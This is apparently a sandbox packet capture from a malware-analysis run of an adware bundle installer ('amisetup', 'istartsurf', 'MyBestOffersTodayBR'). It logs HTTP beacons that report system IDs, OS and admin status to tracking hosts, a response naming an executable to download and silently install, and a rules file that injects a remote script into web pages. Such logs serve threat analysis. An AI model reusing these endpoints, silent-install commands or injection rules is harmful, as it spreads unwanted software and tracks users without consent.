UDRT22FabhHfFE9XbqcgVnkRz35UOxTWE1k4NYthRCBNkXYPFhbxU05kEohzT3MB2w9aHH
iFfwGZVo8qEok6HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Prag
ma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Se
rver: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP002C2..X-
Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Thu, 23 Apr 2015 07:
24:21 GMT..Content-Length: 84..UDRT22FabhHfFE9XbqcgVnkRz35UOxTWE1k4NYt
hRCBNkXYPFhbxU05kEohzT3MB2w9aHHiFfwGZVo8qEok6....


POST /if?alpha=VmkaOm5eUxUWBXAqNRBhVy1JN25WNRYSY3NRW24hCWxLOjpDVRcsXAVyWCxcWzlGMUUVCS1+eQgWH2t6Uz1jJBg8dVkgdgY2CT85LH81F2FVJHM4ZAMsThQsNkRPdXVYOjJfbAcXBz0CIF4bODl/eQIdYyUdaUwuTG0/FHFWTRM5aS4+CysLX2BQY0J0MCgvNUgpfyxrBD8XUDNmChxuNF06Ri1uHRUeUgFSNQc/Ogp9GXlGA0kGenNHNh4uOA9jJG8ObD4OVCpYUwE5JSp3bl1sFGsZbjNCehgTMVxYS3UXMy4Zby9KVU9BZw11UmN4SWMPbBBLTS18OhUsDTM6XkE/aVpnKAdwLBdSVWFvdS4vRAR0ZXwpbRY5DAU3f1lJJGIWbQRvMlxLCkYQUTUHIj0Mfx9/UQNdMmF/H38LNysILGwqGyZrTnkrW2RSaDZfNzsINVctDHNXHjULEzowZFwpNgV7Xzo1RRgeWl5Wawt1KVs5EmYSSh50OjoXPkZmeFk8FTAaMWFbUGJ0PAY8OzwpMwBhYiRAKGdWOBAbMC1zZhcMIS4SczZQGG4/bypaEGh7BxliKEMUSmRedQgrDjckQ0USTwhAOhpyeHN3VXlufnIFLnojEQ== HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache

alpha=WmVjOTkBcgl8RWo/Zl1XbAYWDRg5LjcpaHhWDQdaL0VDTHIOdQcaChhLJmM/X1REKGAneA==
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:22 GMT
Content-Length: 41
{"status":"OK","url":null,"message":null}HTTP/1.1 200 OK..Cache-Contro
l: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain; cha
rset=utf-8..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 
4.0.30319..SVR: SP002C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR".
.Date: Thu, 23 Apr 2015 07:24:22 GMT..Content-Length: 41..{"status":"O
K","url":null,"message":null}..



GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.regok HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.72 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 20
15 07:24:28 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.72 ms","message":"store 1 ac
tion and 0 update "}..0......


GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.finish HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.66 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 20
15 07:24:30 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.66 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..



GET /v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2105 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.82 ms","message":"store 2 action and 4 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 201
5 07:25:01 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"0.82 ms","message":"store 2 act
ion and 4 update "}..0..



GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.RegWrite HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.65 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 201
5 07:24:54 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"0.65 ms","message":"store 1 act
ion and 0 update "}..0..



POST /namen.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.amoninst.com
Content-Length: 70
Connection: Keep-Alive

campid=9664&i=MyBestOffersTodayBR&prefix=amisetup5755&version=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 171
Connection: keep-alive
[Data]..exe=amisetup5755.exe..url=hXXp://VVV.downloadcrest.com/tdownlo
ad.php..params=version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec9
99268&t1=1429774025&campid=9664HTTP/1.1 200 OK..Content-Type: text/pla
in; charset=UTF-8..Date: Thu, 23 Apr 2015 07:24:05 GMT..Server: Apache
/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 171..Conne
ction: keep-alive..[Data]..exe=amisetup5755.exe..url=hXXp://VVV.downlo
adcrest.com/tdownload.php..params=version=1.1.2.41&s1=57a0c198e2d39f18
102a94c10225f3efec999268&t1=1429774025&campid=9664..



GET /install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Thu, 23 Apr 2015 07:24:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 693
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>404 Not Found</title></head>..&
lt;body bgcolor="white">..<h1>404 Not Found</h1>..<p
>The requested URL was not found on this server. Sorry for the inco
nvenience.<br/>..Please report this message and include the foll
owing information to us.<br/>..Thank you very much!</p>..&
lt;table>..<tr>..<td>URL:</td>..<td>hXXp://
log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&ui
d=VMwareXVirtualXIDEXHardXDrive_00000000000000000001</td>..</
tr>..<tr>..<td>Server:</td>..<td>us-pub00.v
9.com</td>..</tr>..<tr>..<td>Date:</td>.
.<td>2015/04/23 02:24:30</td>..</tr>..</table>
..<hr/>Powered by Tengine/1.2.2..</body>..</html>..H
TTP/1.1 404 Not Found..Server: Tengine/1.2.2..Date: Thu, 23 Apr 2015 0
7:24:30 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 6
93..Connection: keep-alive..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTM
L 2.0//EN">..<html>..<head><title>404 Not Found&l
t;/title></head>..<body bgcolor="white">..<h1>404
 Not Found</h1>..<p>The requested URL was not found on thi
s server. Sorry for the inconvenience.<br/>..Please report this 
message and include the following information to us.<br/>..Thank
 you very much!</p>..<table>..<tr>..<td>UR
<<< skipped >>>


GET /s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:23:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..



GET /mobile/mt-core.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:57 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT
ETag: "1448627-161ce-49dac90326480"
Accept-Ranges: bytes
Content-Length: 90574
Connection: close
Content-Type: application/x-javascript
/*.---.MooTools: the javascript framework..web build:. - hXXp://mootoo
ls.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7..packager build:. - packa
ger build Core/Core Core/Array Core/String Core/Number Core/Function C
ore/Object Core/Event Core/Browser Core/Class Core/Class.Extras Core/S
lick.Parser Core/Slick.Finder Core/Element Core/Element.Style Core/Ele
ment.Event Core/Element.Dimensions Core/Fx Core/Fx.CSS Core/Fx.Tween C
ore/Fx.Morph Core/Fx.Transitions Core/Request Core/Request.HTML Core/R
equest.JSON Core/Cookie Core/JSON Core/DOMReady Core/Swiff..copyrights
:.  - [MooTools](hXXp://mootools.net)..licenses:.  - [MIT License](htt
p://mootools.net/license.txt).....*/.(function(){this.MooTools={versio
n:"1.3.1",build:"af48c8d589f43f32212f9bb8ff68a127e6a3ba6c"};var e=this
.typeOf=function(i){if(i==null){return"null";}if(i.$family){return i.$
family();.}if(i.nodeName){if(i.nodeType==1){return"element";}if(i.node
Type==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else
{if(typeof i.length=="number"){if(i.callee){return"arguments";.}if("it
em" in i){return"collection";}}}return typeof i;};var u=this.instanceO
f=function(w,i){if(w==null){return false;}var v=w.$constructor||w.cons
tructor;.while(v){if(v===i){return true;}v=v.parent;}return w instance
of i;};var f=this.Function;var r=true;for(var q in {toString:1}){r=nul
l;}if(r){r=["hasOwnProperty","valueOf","isPrototypeOf","propertyIsEnum
erable","toLocaleString","toString","constructor"];.}f.prototype.overl
oadSetter=function(v){var i=this;return function(x,w){if(x==null){
<<< skipped >>>


GET /registro/carregando.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:39 GMT
Content-Type: image/gif
Content-Length: 4176
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:39 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a . ........{...........................l..D..N..............L.}.
..........................6...........z..<..(..,.....v.....".....V.
....... ....................&........>.....t.................0.....
...B.................Z..$.....~..r..............|.....h..j........`...
.....x........X..2.................*..b..^.....p......................
.....................................................!..NETSCAPE2.0...
..!..Created with ajaxload.info.!.......,.... . ......................
)...).4.)...3....*.5..A..9@..... ..&.....<........ ........)KFN....
!.......%....."..!'.........,..D......#..6...`xU....-T......A. d .....
..1.. ...._.r`...A......Q.'.L.pH`A....Q0BKA....1.......F..`...c.pdld..
....(.`b.....R.p"...a.=xa!./{..6...B...?6.%b..Ru$`..2$....6dC..E.c!F(C
.A.S.%hE.......@.. ...$'rbP..I.)D.v.........(....wFj..2....3>X.p@..
cF<.:..I....T.....#.JD'.7....-.MK...%&...`...@.!.......,.... . ....
........TT).......I((K/.....4F....F......K....I........AFL..FA.....(.X
MDF..%....$..:(NI..........<....<(0.6[C..I...B!.$.EZ..3...Q.8.$.
.8V r`B."..o.n.)....O.`0..L..'."(H..c#.....B..?..081....[0........' .B
......~` A....FB(......M;z.".D<......bC....t1J...'U.j......!....$..
.....u.......8.{e..#Q........%.UP.N..(N.....D.&.....$s..`G...eJ&.8D0..
 A.....).....K.j..E....<H1."..B.j.:...N.<z...c..! @..b.c..!sP...
H.......!.......,.... . ..................E]A......K.5F#.....O ..%@-..
..........>@L..:...D.8'....N.[.<.-\..Q.'["&../_...%%:..M...O..%.
..T...:.&9A*G.,.N.&......J.......T.`.......s....B.Np.!...'..(.....
<<< skipped >>>


POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.amoninst.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 309

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=9664&exe=amisetup5755__9664&ffver=&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1429773854&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:25 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
15d1....      ..      ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
1 Transitional//EN">..<html>..<head>..<meta http-equ
iv="content-type" content="text/html; charset=UTF-8" /> ..<title
>Installer</title>..<base href="hXXp://VVV.amoninst.com:80
/index.php" />..<script type="text/javascript" src="hXXp://cdn1.
downloadcrest.com/V19/amipb.js"></script>..<script type="t
ext/javascript">..var g_amiobj = '', g_ami, g_updb = false, g_close
 = '0', g_additional_offer_list = '0';..var g_finish_install_button = 
'0';..var g_popup_install_all = '0';..var g_eula = ''; ..var g_post1 =
 '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c90
7b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl
=&_netfs=-31&_vert=3';..var g_icon = '';..var g_comps = [], g_pages = 
[], c, g_curPage = -1;..var g_cid = '9664';..var g_tid = '';..var g_cc
 = 'UA';..var g_lang = 'en';..var g_ip = '37.57.16.189';..var g_browse
r = 'ie';..var g_cnt = '3ad80c247cbd60f855b8cf1954a59b1b';..var g_ver 
= '1.1.2.41';..var g_buttonImage = 1;..var g_thanks = 'thankyou.php';.
.var g_images = [];..var g_purl = 'hXXp://VVV.amoninst.com:80/pix.php'
;..var g_skipCats = 0;..var g_ieVer = '6.0';..var g_chVer = '';..var g
_ffVer = '';..var g_netfs = -31;..var g_vert  = 3;..var g_os  = "NT5.1
SP3";..var g_current_screen = '';..var g_custom_next_button_event = '0
';..var g_custom_next_button = '0';..var g_install_all = 0;....functio
n InitInstall()..{..    g_ami.AddThanksParameter('tid', g_tid);.. 
<<< skipped >>>

POST /finalize.php HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.amoninst.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 229
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 23 Apr 2015 07:24:28 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2409
Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps></comps><must_show&g
t;0</must_show><bdy>PGRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZG
l2IGNsYXNzPSJjaGVjay1ob2xkZXIiPjxkaXYgY2xhc3M9ImNsYXNzLWNoZWNrLTEiIGlk
PSJhbWlfY2hlY2tfTXlCZXN0T2ZmZXJzVG9kYXlCUiIgb25jbGljaz0iQW1pQ2hlY2tDdH
JsQ2xpY2tlZCgpIj4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgaWQ9Imlf
YW1pX015QmVzdE9mZmVyc1RvZGF5QlIiIG5hbWU9Ik15IEJlc3QgT2ZmZXJzIFRvZGF5Ii
B0eXBlPSJoaWRkZW4iIHZhbHVlPSIxIiAvPjwvZGl2PjxkaXYgY2xhc3M9ImNsYXNzLWxp
bmUxIj48c3Bhbj5UT0RPUyBPUyBESUFTIFVNQSBPRkVSVEEhPC9zcGFuPjwvZGl2PjwvZG
l2PjxkaXYgY2xhc3M9ImNsYXNzLWxpbmUyIj48c3Bhbj5CeSBDbGlja2luZyAiTmV4dCIg
b3IgIkluc3RhbGwiLCBJIGFncmVlIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vZ29vLmdsL2
5pMm1yZSIgdGFyZ2V0PSJfYmxhbmsiPlRlcm1zIG9mIFNlcnZpY2U8L2E IGFuZCA8YSBo
cmVmPSJodHRwOi8vZ29vLmdsL1NIcDhSZyIgdGFyZ2V0PSJfYmxhbmsiPlByaXZhY3kgUG
9saWN5PC9hPiBhbmQgY29uc2VudCB0byBpbnN0YWxsIE15IEJlc3QgT2ZmZXJzIFRvZGF5
Ljwvc3Bhbj48L2Rpdj48L2Rpdj48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgaW
Q9ImlfYW1pX3VwZGF0ZXIiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0idXBkYXRl
cixNeUJlc3RPZmZlcnNUb2RheUJSIiBpZD0iYWxsX3Nob3J0X25hbWVzIi8 </bdy&g
t;<img>__empty__</img></page><page><f>1&
lt;/f><fb>0</fb><pt>1</pt><cats>0<
/cats><updh>1</updh><wrn></wrn><comps>
;</comps><must_show>0</must_show><bdy>DQo8
<<< skipped >>>


POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.amoninst.com
Connection: Keep-Alive
Content-Length: 1340

_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=37.57.16.189&cmdl=amisetup5755__9664.exe /s  /ver 1.1.2.41  /u http://VVV.amoninst.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR&cnt=3ad80c247cbd60f855b8cf1954a59b1b¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT5.1SP3&sysid=B3920CF566AB717F84CE9CE32F62B904&sysid1=B3920CF566AB717F84CE9CE32F62B904&te=1429773860&tid=&ts=1429773854&ver=1.1.2.41&vert=3&mh=91c1b2cbe72cfa41cf10f8484f47dffe909b4dcf&base=_srvlog=&browser=ie&c%5BMyBestOffersTodayBR%5D%5Br%5D=0.01&c%5BMyBestOffersTodayBR%5D%5Bs%5D=-1&c%5Bupdater%5D%5Br%5D=0&c%5Bupdater%5D%5Bs%5D=-1&capp=updater&cc=UA&cid=9664&clip=37.57.16.189&cmdl=amisetup5755__9664.exe+%2Fs++%2Fver+1.1.2.41++%2Fu+http%3A%2F%2FVVV.amoninst.com%2Findex.php+%2Fta+%2Fci+9664+%2Fi+MyBestOffersTodayBR&cnt=3ad80c247cbd60f855b8cf1954a59b1b¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT5.1SP3&sysid=B3920CF566AB717F84CE9CE32F62B904&sysid1=B3920CF566AB717F84CE9CE32F62B904&te=1429773860&tid=&ts=1429773854&ver=1.1.2.41&vert=3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:29 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
....      ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..
Date: Thu, 23 Apr 2015 07:24:29 GMT..Server: Apache/2.2.15 (Red Hat)..
X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...
...      ....



GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.dlzip1.istartsurf.finish,9 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<.
...........T..Z.....H.....0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Da
te: Thu, 23 Apr 2015 07:24:17 GMT..Content-Type: text/html; charset=ut
f-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By:
 PHP/5.3.3..xa-api-version: v4..Content-Encoding: gzip..57............
.V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..
Z.....H.....0..



GET /services/rules.txt?dummy=243 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/plain
Content-Length: 180
Connection: keep-alive
Last-Modified: Thu, 26 Mar 2015 16:45:36 GMT
ETag: "57c94d-b4-51233beb94c00"
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js
"></script></head>.{njax_null}|<script src="hXXps://
VVV.njaxjs.me/services/script.js" type="text/javascript"></scrip
t>.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:
24:37 GMT..Content-Type: text/plain..Content-Length: 180..Connection: 
keep-alive..Last-Modified: Thu, 26 Mar 2015 16:45:36 GMT..ETag: "57c94
d-b4-51233beb94c00"..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provid
ed by Intermedia..X-Country: EU..Accept-Ranges: bytes..</head>|&
lt;script src="hXXps://VVV.njaxjs.me/services/script.js"></scrip
t></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/s
ervices/script.js" type="text/javascript"></script>...
..


GET /services/update.php?v=1.2.0&key=FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX&dummy=708 HTTP/1.0


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:38 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:38 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia
..X-Country: EU..



GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.hp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.56 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 20
15 07:24:28 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.56 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /3517/2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 23 Apr 2015 04:24:07 GMT
